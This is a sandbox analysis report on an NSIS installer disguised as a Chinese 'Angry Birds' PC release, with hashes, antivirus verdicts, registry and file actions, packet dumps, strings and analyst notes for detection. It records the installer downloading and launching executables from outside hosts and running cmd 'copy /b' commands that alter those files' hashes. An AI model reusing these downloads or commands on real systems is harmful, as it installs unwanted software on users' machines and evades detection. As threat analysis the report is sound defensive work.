Analysis Date: 2015-01-28 16:46:09
MD5: 9654c5bada3eb72d86f93594feb5909f
SHA1: fe6ac30dfd169dfec3664260ed4e6a647d261184

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 856b32eb77dfd6fb67f21d6543272da5 sha1: 6597c511c2ee72f68f5246460f0683dae16dcade size: 24064
Section: .rdata md5: dc77f8a1e6985a4361c55642680ddb4f sha1: 3d397ee25b2dd83ab741c67375880151cae94ed8 size: 5120
Section: .data md5: 7922d4ce117d7d5b3ac2cffe4b0b5e4f sha1: 4e56bb1994226ae0285c7adee470777262de2c99 size: 1024
Section: .ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
[Analyst note: .ndata is empty on disk, so its MD5 and SHA1 are the hashes of zero-length input; they match any empty section and are not usable as indicators.]
Section: .rsrc md5: 32f43c3b01cb3fe9eca93e19f47294d1 sha1: c192680b9bc1e8e75da941c237f0edc580a1d3d4 size: 29184
Timestamp: 2009-12-05 22:50:52
[Analyst note: the manifest under Strings identifies the stub as Nullsoft Install System v2.46, so this PE timestamp is likely that of the stock NSIS stub rather than the build time of this installer.]
Version: LegalCopyright: BEARPC精选软件集
ProductName: 愤怒的小鸟
FileDescription: 愤怒的小鸟PC汉化版
FileVersion: 1.0.0
CompanyName: www.bearpc.net
Packer: Nullsoft PiMP Stub -> SFX
PEhash: b6bc5556e915d106e40e7968e3b9661d127c1d8e
IMPhash: 7fa974366048f9c551ef45714595665e
AV: 360 Safe — no_virus
AV: Ad-Aware — no_virus
AV: Alwil (avast) — Malware-gen:Win32:Malware-gen
AV: Arcabit (arcavir) — no_virus
AV: Authentium — no_virus
AV: Avira (antivir) — TR/Agent.263501
AV: BullGuard — no_virus
AV: CA (E-Trust Ino) — no_virus
AV: CAT (quickheal) — no_virus
AV: ClamAV — no_virus
AV: Dr. Web — no_virus
AV: Emsisoft — no_virus
AV: Eset (nod32) — NSIS/TrojanDownloader.Chindo.R
AV: Fortinet — no_virus
AV: Frisk (f-prot) — no_virus
AV: F-Secure — no_virus
AV: Grisoft (avg) — no_virus
AV: Ikarus — no_virus
AV: K7 — no_virus
AV: Kaspersky — no_virus
AV: MalwareBytes — Riskware.Chindo
AV: Mcafee — no_virus
AV: Microsoft Security Essentials — no_virus
AV: MicroWorld (escan) — no_virus
AV: Rising — no_virus
AV: Sophos — no_virus
AV: Symantec — no_virus
AV: Trend Micro — no_virus
AV: VirusBlokAda (vba32) — no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\inetc.dll
Creates FileOfficeAssist.0405.80.1119.exe
Creates File1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\Base64.dll
Creates File1.rar
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\System.dll
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\ExecCmd.dll
Creates FileMM-liao8302.exe
Creates FileC:\Program Files\2.ico
Creates Fileyx_dts.exe
Creates FileFunshionInstall_C70699.exe
Creates Filesetup_95165069.exe
Creates FileC:\Program Files\4.ico
Deletes FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Deletes FileOfficeAssist.0405.80.1119.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp
Deletes File1.rar
Deletes File1
Deletes FileMM-liao8302.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsd1.tmp
Deletes Fileyx_dts.exe
Deletes FileFunshionInstall_C70699.exe
Deletes Filesetup_95165069.exe
Deletes FileC:\Program Files\4.ico
[Analyst note: each `copy /b "X" + "C:\WINDOWS\Fonts\gulim.ttc" "X"` command below appends the system font file to a downloaded installer in place, so the file left on disk will not hash to the same value as the payload fetched over HTTP.]
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\setup_95165069.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\setup_95165069.exe"
Creates Process: SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\yx_dts.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\yx_dts.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\OfficeAssist.0405.80.1119.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\OfficeAssist.0405.80.1119.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\MM-liao8302.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\MM-liao8302.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\FunshionInstall_C70699.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\FunshionInstall_C70699.exe"
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex2.ico
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSint.dpool.sina.com.cn
Winsock DNSt.cn
Winsock DNSmmliao.jianting.net

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\yx_dts.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\yx_dts.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\MM-liao8302.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\MM-liao8302.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\FunshionInstall_C70699.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\FunshionInstall_C70699.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\setup_95165069.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\setup_95165069.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\OfficeAssist.0405.80.1119.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\OfficeAssist.0405.80.1119.exe"

Process
↳ SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe

Network Details:

DNSint.dpool.sina.com.cn
Type: A
180.149.136.250
DNSt.cn
Type: A
114.134.80.138
DNSmmliao.jianting.net
Type: A
122.227.42.227
DNS37w.xdwscache.glb0.lxdns.com
Type: A
183.136.208.114
DNSdown.fspcdn.com
Type: A
182.118.38.50
DNSdown.fspcdn.com
Type: A
182.118.38.51
DNSdown.fspcdn.com
Type: A
221.204.189.11
DNSdown.fspcdn.com
Type: A
221.204.189.12
DNSwww.bangshijz.com
Type: A
42.121.255.144
DNSdownload012.e.chinacache.com.cn
Type: A
61.179.105.148
DNSdownload012.e.chinacache.com.cn
Type: A
218.60.107.12
DNSc01.i06.arnic.hadns.net
Type: A
183.56.172.47
DNSc01.i06.arnic.hadns.net
Type: A
222.186.20.122
DNSc01.i06.arnic.hadns.net
Type: A
58.220.2.5
DNSc01.i06.arnic.hadns.net
Type: A
113.17.184.10
DNSc01.i06.arnic.hadns.net
Type: A
121.10.117.139
DNSd.qq66699.com
Type: A
DNSneirong.funshion.com
Type: A
DNSwdl1.cache.wps.cn
Type: A
DNSdl.nx5.com
Type: A
HTTP GEThttp://int.dpool.sina.com.cn/iplookup/iplookup.php
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://t.cn/RZIvNie
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://mmliao.jianting.net/mmliao/MM-liao8302.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://d.qq66699.com/yx/dts/sqft/905848/yx_dts.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://neirong.funshion.com/software/files/silent5/FunshionInstall_C70699.exe
User-Agent: NSIS_Inetc (Mozilla)
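HTTP GET http://www.bangshijz.com/ZmU2YWMzMGRmZDE2OWRmZWMzNjY0MjYwZWQ0ZTZhNjQ3ZDI2MTE4NC5leGU=/40.html
User-Agent: NSIS_Inetc (Mozilla)
[Analyst note: the Base64 path segment decodes to fe6ac30dfd169dfec3664260ed4e6a647d261184.exe, i.e. this sample's SHA1 plus ".exe" — apparently the name of the submitted file. The path therefore likely varies with the file name, so detection is better keyed on the host and User-Agent than on the full URL.]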
HTTP GEThttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0405.80.1119.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://t.cn/RZII9Xg
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dl.nx5.com/apk/20141222/setup_95165069.exe
User-Agent: NSIS_Inetc (Mozilla)
Flows TCP192.168.1.1:1031 ➝ 180.149.136.250:80
Flows TCP192.168.1.1:1032 ➝ 114.134.80.138:80
Flows TCP192.168.1.1:1033 ➝ 122.227.42.227:80
Flows TCP192.168.1.1:1034 ➝ 183.136.208.114:80
Flows TCP192.168.1.1:1035 ➝ 182.118.38.50:80
Flows TCP192.168.1.1:1036 ➝ 42.121.255.144:80
Flows TCP192.168.1.1:1037 ➝ 61.179.105.148:80
Flows TCP192.168.1.1:1038 ➝ 114.134.80.138:80
Flows TCP192.168.1.1:1039 ➝ 183.56.172.47:80

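Raw Pcap
[Analyst note: several dumps below continue past the terminating CRLF CRLF with bytes identical to the tail of an earlier, longer request at the same offsets; these look like stale capture-buffer contents rather than data sent on the wire.]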
0x00000000 (00000)   47455420 2f69706c 6f6f6b75 702f6970   GET /iplookup/ip
0x00000010 (00016)   6c6f6f6b 75702e70 68702048 5454502f   lookup.php HTTP/
0x00000020 (00032)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000030 (00048)   204e5349 535f496e 65746320 284d6f7a    NSIS_Inetc (Moz
0x00000040 (00064)   696c6c61 290d0a48 6f73743a 20696e74   illa)..Host: int
0x00000050 (00080)   2e64706f 6f6c2e73 696e612e 636f6d2e   .dpool.sina.com.
0x00000060 (00096)   636e0d0a 436f6e6e 65637469 6f6e3a20   cn..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f525a49 764e6965 20485454   GET /RZIvNie HTT
0x00000010 (00016)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000020 (00032)   743a204e 5349535f 496e6574 6320284d   t: NSIS_Inetc (M
0x00000030 (00048)   6f7a696c 6c61290d 0a486f73 743a2074   ozilla)..Host: t
0x00000040 (00064)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000050 (00080)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000060 (00096)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000070 (00112)   61636865 0d0a0d0a 76650d0a 43616368   ache....ve..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f6d6d6c 69616f2f 4d4d2d6c   GET /mmliao/MM-l
0x00000010 (00016)   69616f38 3330322e 65786520 48545450   iao8302.exe HTTP
0x00000020 (00032)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000030 (00048)   3a204e53 49535f49 6e657463 20284d6f   : NSIS_Inetc (Mo
0x00000040 (00064)   7a696c6c 61290d0a 486f7374 3a206d6d   zilla)..Host: mm
0x00000050 (00080)   6c69616f 2e6a6961 6e74696e 672e6e65   liao.jianting.ne
0x00000060 (00096)   740d0a43 6f6e6e65 6374696f 6e3a204b   t..Connection: K
0x00000070 (00112)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x00000080 (00128)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000090 (00144)   68650d0a 0d0a0a                       he.....

0x00000000 (00000)   47455420 2f79782f 6474732f 73716674   GET /yx/dts/sqft
0x00000010 (00016)   2f393035 3834382f 79785f64 74732e65   /905848/yx_dts.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a557365   xe HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 204e5349 535f496e   r-Agent: NSIS_In
0x00000040 (00064)   65746320 284d6f7a 696c6c61 290d0a48   etc (Mozilla)..H
0x00000050 (00080)   6f73743a 20642e71 71363636 39392e63   ost: d.qq66699.c
0x00000060 (00096)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f736f66 74776172 652f6669   GET /software/fi
0x00000010 (00016)   6c65732f 73696c65 6e74352f 46756e73   les/silent5/Funs
0x00000020 (00032)   68696f6e 496e7374 616c6c5f 43373036   hionInstall_C706
0x00000030 (00048)   39392e65 78652048 5454502f 312e310d   99.exe HTTP/1.1.
0x00000040 (00064)   0a557365 722d4167 656e743a 204e5349   .User-Agent: NSI
0x00000050 (00080)   535f496e 65746320 284d6f7a 696c6c61   S_Inetc (Mozilla
0x00000060 (00096)   290d0a48 6f73743a 206e6569 726f6e67   )..Host: neirong
0x00000070 (00112)   2e66756e 7368696f 6e2e636f 6d0d0a43   .funshion.com..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x00000090 (00144)   416c6976 650d0a43 61636865 2d436f6e   Alive..Cache-Con
0x000000a0 (00160)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f5a6d55 3259574d 7a4d4752   GET /ZmU2YWMzMGR
0x00000010 (00016)   6d5a4445 324f5752 6d5a574d 7a4e6a59   mZDE2OWRmZWMzNjY
0x00000020 (00032)   304d6a59 775a5751 305a545a 684e6a51   0MjYwZWQ0ZTZhNjQ
0x00000030 (00048)   335a4449 324d5445 344e4335 6c654755   3ZDI2MTE4NC5leGU
0x00000040 (00064)   3d2f3430 2e68746d 6c204854 54502f31   =/40.html HTTP/1
0x00000050 (00080)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000060 (00096)   4e534953 5f496e65 74632028 4d6f7a69   NSIS_Inetc (Mozi
0x00000070 (00112)   6c6c6129 0d0a486f 73743a20 7777772e   lla)..Host: www.
0x00000080 (00128)   62616e67 7368696a 7a2e636f 6d0d0a43   bangshijz.com..C
0x00000090 (00144)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000a0 (00160)   416c6976 650d0a43 61636865 2d436f6e   Alive..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3430352e 38302e31 3131392e 65786520   405.80.1119.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204e53 49535f49 6e657463   gent: NSIS_Inetc
0x00000050 (00080)   20284d6f 7a696c6c 61290d0a 486f7374    (Mozilla)..Host
0x00000060 (00096)   3a207764 6c312e63 61636865 2e777073   : wdl1.cache.wps
0x00000070 (00112)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000080 (00128)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000090 (00144)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f525a49 49395867 20485454   GET /RZII9Xg HTT
0x00000010 (00016)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000020 (00032)   743a204e 5349535f 496e6574 6320284d   t: NSIS_Inetc (M
0x00000030 (00048)   6f7a696c 6c61290d 0a486f73 743a2074   ozilla)..Host: t
0x00000040 (00064)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000050 (00080)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000060 (00096)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000070 (00112)   61636865 0d0a0d0a 6e656374 696f6e3a   ache....nection:
0x00000080 (00128)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000090 (00144)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f61706b 2f323031 34313232   GET /apk/2014122
0x00000010 (00016)   322f7365 7475705f 39353136 35303639   2/setup_95165069
0x00000020 (00032)   2e657865 20485454 502f312e 310d0a55   .exe HTTP/1.1..U
0x00000030 (00048)   7365722d 4167656e 743a204e 5349535f   ser-Agent: NSIS_
0x00000040 (00064)   496e6574 6320284d 6f7a696c 6c61290d   Inetc (Mozilla).
0x00000050 (00080)   0a486f73 743a2064 6c2e6e78 352e636f   .Host: dl.nx5.co
0x00000060 (00096)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x00000070 (00112)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x00000080 (00128)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000090 (00144)   68650d0a 0d0a7472 6f6c3a20 6e6f2d63   he....trol: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..


Strings
 " ".E.
.
080403a8
1.0.0
!1Aa
#+3;CScs
BEARPC
CompanyName
FileDescription
FileVersion
LegalCopyright
msctls_progress32
Please wait while Setup is loading...
ProductName
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
www.bearpc.net
-:~\,_
*?|<>/":
0B7Qw}
0c%%\\))8?GlQV
0.eIP:$
0/`'|g
<0kac}
#';0m(4
_0n4n1
0RV0ff'
0}xyN5
1/5>uqk
1.8w0O
1AH@7t
1>biDe
1GGVG{
*(1hfPV
>1hsD!
1}?|,O
1u2u3m0m!5
;23vTe
2"&,\45>
+#-28<
2c N*&
2EES7{
2iavRQ
2J9V9I
;{2OCJj
32=h\8g
3B7jFG{
3~qMgk
3yJ.pK
%4\~/6
$(.469+A
$(.469=EFHJ
$(.469=EFM
$(.469=ET
$(.469F
$(.46%A
$(.46J
4}},h_
;4|y3]#v$
5?'3CeZ
57)U`>
5+>	7x0c
[5E''01
5=#!e]%7_f
5i	Oxw
6AD}II
6KDu|3
6>:lLXM
6,%lzXqXY
6n6>n|
6 |rV\q
6Wd*D0
=-/+;:7
77$Q/&=M
*78:YU
/79cUO
7~a<f<n<e
7hSgfh
7p<*hn
<7[v5#
;8721^.
?[8?GOQY
/8HxelH
8NCRCu
8nDDbih/[g
8RBx?\"\
8`xue,0
=:953,&
/953,&
]:953,&
<98=xz
=%99RRLL
>9D<Gt`
9NCo[Ns
&9Y4wz{(!
@9y$+ig:
9y,.=M
AdjustTokenPrivileges
a`ds&2U
ADVAPI32
ADVAPI32.dll
	Ao94w
AppendMenuA
A[TNgk
a]u;t'
]awDPhk
/azY^<
B$1_`ajbgA
b1l^Q[
b>;af{
BeginPaint
bh)F5sA
"bipU8
)bkVBh
b'ROB~
/bYNE~
/^`'C0$
C2a2N2q
c3\&Km
c?)9> o
CallWindowProcA
`$cbXK
cE/08N
CE=+FU
CharNextA
CharPrevA
CheckDlgButton
c_h[\m
C#[/>iiD>8!#7
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
CVALp>
... %d%%
D$0+D$(P
d2=kjV
!d"(.469=EFHJMTr
`D8u?_\
@.data
d)|{d@?
D$(+D$ SSP
.DEFAULT\Control Panel\International
DefWindowProcA
d	e@Gc
DeleteFileA
DeleteObject
DestroyWindow
dfT&Yj
DialogBoxParamA
DispatchMessageA
dK#'ov
dnzzqqmhcd
Dooo'MMM
Do-?[q
D$$Ph,
DrawTextA
D$(SPS
-*!$%d:ZU1N
e2qB:&
E[A;5*N
($e$%b?
ed))dd++ee///^^^O
eGLS;d
EmptyClipboard
)::::EMT
E<_'N3$f
EnableMenuItem
EnableWindow
EndDialog
EndPaint
_EO	'X
eQ}R]fZ
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
ErT,-468
EtjF2]
e%uy%u
ev@m&dm}
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
E|&`Xr
f+3zn=
Ff&R`:^
F)))G/+
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
Fj7(-"ASY4
FreeLibrary
FVtsDE
$g>'	!
g5/k6il
}.GAN\
GA +Ufv
gBp-]\7P
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
g"}IPN
-gkX-F
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
%,GNw%
G[os84\^
G@p@"$
G(Qjva
g.ZO||k[
h4g2+y
$H7Db@
HEB=:`^[@
HEB=:953-\2
HEB=:953,&"\f
{_HFlJJ
hJy]8b
>_hM[M%~
H( &N$X
hOeFv0
[htA_v
http://nsis.sf.net/NSIS_Error
HtVHtHH
h&.W>~-
hW6J%9
`hY}y!;FV
@i5w44
i=:953,&H
i=;:953,M
{i|C,!/
i$|GS-7
IH`3%&V
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu`
InvalidateRect
:iPa{=
i(QT`S
:`i"Re
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
I ) uH(
iy0"sJF
J2`SGm
j8;Rgm&
	J9@xo
JCz#.i`G
Jen?TT
-*!JEqfi
J=i?XU
jj4k4/j^
J.U+A)oe
k[%$$\
$>Kb,&`
_k:C??
	]KC$"4
k<d<a<kl6
KERNEL32
KERNEL32.dll
K^?FuS
k i#~[
``kk	9X
KKKKQKT
kNj~D[
kV7V65
?K?%`y
\kyFP>)u
kZ{:@l*
)?k-ZO
l ~8FU
laAQn2
lc%%\\))dd++ee//>nl
 lDNkU`
LD_rtr
l$!hR[M
lJ$fS"3
Lk^a~,
{Lk_	E'
LLYT]T/
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LOe}%"
LookupPrivilegeValueA
l;r*,*
.,lRXn
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpynA
lstrlenA
luunniiDu
@LX<P\
>Lzjd~
^::::::;M
!"%,[M
]:::::::M
m1&(!hZ
@|M5ssT($
m72RTj
m`Bj*Lz
`}meMzIAImiiiC
MessageBoxIndirectA
-}M_GAR\
/m=GKn
\Microsoft\Internet Explorer\Quick Launch
MMMMMMMMMMMM
More information at:
MoveFileA
MoveFileExA
m:::::::R
mrf^ivl
MulDiv
MultiByteToWideChar
N]]-0:
N'2BVq
/_]`n5>
?n7o68
.ndata
Nj,R^r
nM=J>q
/"n"n#
nnngwwp
~nnnnnnngx
NSIS Error
~nsu.tmp
NullsoftInst
NulluN	E
Nwb(iY
NWV:U1}{Fh
NYtl8`
}(\_o?
o@5w	Ft1
(O8QRd
?o#ebM
||offZZZJj
]o&G=:6
ole32.dll
OleInitialize
OleUninitialize
~{onyR
OpenClipboard
OpenProcessToken
or$>H)}|
oW@"DjNX
^owgf4
"oy2#%
\P3zUkP
p{:`5S[
PC|GS#
PeekMessageA
pepmpnp
Phj{p*
P=,"i+
PostQuitMessage
PPPPPP
pq<wAq^
p,R{	z
{{]^///^^^^Q
,Q*eMV`
/qMqfC
QP\X\Z
QqAl5R\
qqqqqqq)A
~q+vM-
r3!?cH
R:953,&
%("RBs~
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
RemoveDirectoryA
[Rename]
"r"&ET
`r.!GR#
RHEB=:953,&
RichEd20
RichEd32
RichEdit
RichEdit20A
R]IlQ 
'}r%PG^A
rT*)#)
r|TH&a
rt<N;{DSA
:rufP[~
S0C~zH
|"S,?a
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
S+jT+:
S$,jVbI
SJ\ys2@
softuW
Software\Microsoft\Windows\CurrentVersion
SQSSSPW
srE@~D
SSS)}}}
SSSSSSSS
[S_Tq}n
svvvvvvvgA
Swwwj=B>
SystemParametersInfoA
> _?=t
_!.@t-
.t.|}+
t#5{e*
t7>]$MT
=t+9p3
^[t{A;
TE^"N*
TFB=:953,&
!This program cannot be run in DOS mode.
tNJ.7O
_^[t	P
-[.^tpp
]tQe67
:-tQhM
TrackPopupMenu
TV/uaa
TWRL/dN
ty<Qym
uC{7Qi
uee*))))00
;;;Ueee
}&U,_]G
UKCT_1y
ulid\VL
un,nqW
USER32.dll
uU4v81
%u.%u%s%s
u?`~vff
`uX\%M
verifying installer: %d%%
VerQueryValueA
VERSION.dll
%ve^Xm
VhusA3
v-{=mG|x
VpgZy]
V.S6)[
VTz;qP
VVCcFj
v#Vh;+@
~~vvphh
~~vvpphc_
~~vvvlia<<
vx6S8j7{
:	}:-W
W7'''''7A
WaitForSingleObject
	=/Wb02
W<b^x >1}
wcuhl-
|w;erK
wk"4+4[5
WKq2o6
wKtrv3:
'w,,lU
WLZ9,~
|wOpT+M@
#W\qEM
W"R?46
WriteFile
WritePrivateProfileStringA
wRO?D)
W?rYg~#
wsprintfA
wT3QeH
WU'%]469=EFHJNl0#A
WWWtF>
wwwwww
wwwwwwww
wwwwwwwwwx
wwwwwwx
wwwwwx
Wx}})u7M/
x2Yg=X
x>5155:
X^7,8=#
xe,g+\^
xgsTMJ
!}XH/\o
X<I*2kr
X;I@b?
XK;s|9
xL~^^6
